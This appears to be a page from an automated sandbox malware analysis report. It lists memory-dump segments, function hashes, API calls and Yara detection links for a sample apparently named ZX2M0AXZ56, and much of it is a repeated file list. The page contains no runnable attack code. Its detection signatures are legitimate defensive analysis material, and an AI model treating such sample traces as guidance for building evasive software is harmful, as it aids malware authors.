Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: )$+$>$@$F$L$[$`
API String ID: 0-4163809010
Opcode ID: a48e4d6aea50f48e541117e91ceab89cf8d125c9a6ac44a0720aa66ceb1f945b
Instruction ID: c63a471f8f4dfec0341c7e301f8d84929706ca96e0eab14613d8a1d48a411405
Opcode Fuzzy Hash: a48e4d6aea50f48e541117e91ceab89cf8d125c9a6ac44a0720aa66ceb1f945b
Instruction Fuzzy Hash: 4852C27560C7808BD364DB38C4907AFBBE1ABD6324F194A2EE4D9C7392D6388941CB57

Function 004E8EA0 Relevance: 15.3, Strings: 12, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 004E8F4B
], xrefs: 004E9196
\, xrefs: 004E9063
_, xrefs: 004E8F3C
^, xrefs: 004E8F41
^, xrefs: 004E9059
\, xrefs: 004E919B
], xrefs: 004E8F46
^, xrefs: 004E9191
_, xrefs: 004E918C
], xrefs: 004E905E
_, xrefs: 004E9054

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: \$\$\$]$]$]$^$^$^$_$_$_
API String ID: 0-1108506012
Opcode ID: 768de620b9939ba22e236952a2237da53f11c4971a0312d18e55c9c86931745a
Instruction ID: 80cd5343b44344de70eda90225a08abe5811749fcd69fa4c7433dea7e48956f8
Opcode Fuzzy Hash: 768de620b9939ba22e236952a2237da53f11c4971a0312d18e55c9c86931745a
Instruction Fuzzy Hash: 41B1F77164C7C08BE3148A69CC8436BBBD257C6325F1D4B6EE5E9873C2C6BD8885874B

Function 004B8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004B8A4A

Part of subcall function 004BB7B0: FreeLibrary.KERNEL32(004B8A31), ref: 004BB7B6
Part of subcall function 004BB7B0: FreeLibrary.KERNEL32 ref: 004BB7D7

Strings

}, xrefs: 004B8913
}, xrefs: 004B890C
b]u), xrefs: 004B8877

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: FreeLibrary$ExitProcess
String ID: b]u)$}$}
API String ID: 1614911148-2900034282
Opcode ID: 437d5dd9e38c22a4c7cbb27805ebdad9c9e18975404c3ec37a5e9db9acc36d47
Instruction ID: 44910928dca5b587be0b74073d52d8aa4b771b4f066c8cb9199155c65ae499d4
Opcode Fuzzy Hash: 437d5dd9e38c22a4c7cbb27805ebdad9c9e18975404c3ec37a5e9db9acc36d47
Instruction Fuzzy Hash: 01C10673E187144BC718DF69C84125AF7D6ABC8714F0EC52EA898EB391EA74DC058BC6

Function 004DD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 004DD3EE

Strings

><+, xrefs: 004DD353

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ><+
API String ID: 3960555810-2918635699
Opcode ID: 0cf53f227c344abd225a6db2e2f4e0b766a5034cb7f109694549c8cb7a58a365
Instruction ID: e46e92a001a6f7cef7ab2064a012b1d0adbd63c3413efe218b0231977a608ad9
Opcode Fuzzy Hash: 0cf53f227c344abd225a6db2e2f4e0b766a5034cb7f109694549c8cb7a58a365
Instruction Fuzzy Hash: 1FC1C575A047418FD725CF2AC4A0762FBE2BF96314F18859EC4DA8B752C739E806CB54

Function 004F0D20 Relevance: 2.9, Strings: 2, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 004F0DC3, 004F0EAB
@Ukx, xrefs: 004F0F53

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID: @Ukx$
API String ID: 2994545307-3636270652
Opcode ID: 2c06af15b00f35e87e06b1475b5d04b11b5bf3300df42a68fef9347075d7975e
Instruction ID: 538296a3c6cf51cf86e0c6e350db9c97934ca1bfda58b3f6e2b4e55d50ad4fb3
Opcode Fuzzy Hash: 2c06af15b00f35e87e06b1475b5d04b11b5bf3300df42a68fef9347075d7975e
Instruction Fuzzy Hash: 84B16732B083548BD728CE28DCE12BBB792EBC5314F19C53DDA9657396CA399C05C786

Function 004BE687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON

Download Yara Rule

Strings

692E49CD1716A3B7BEBA0C6A975F1733, xrefs: 004BE770, 004BE8FE

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
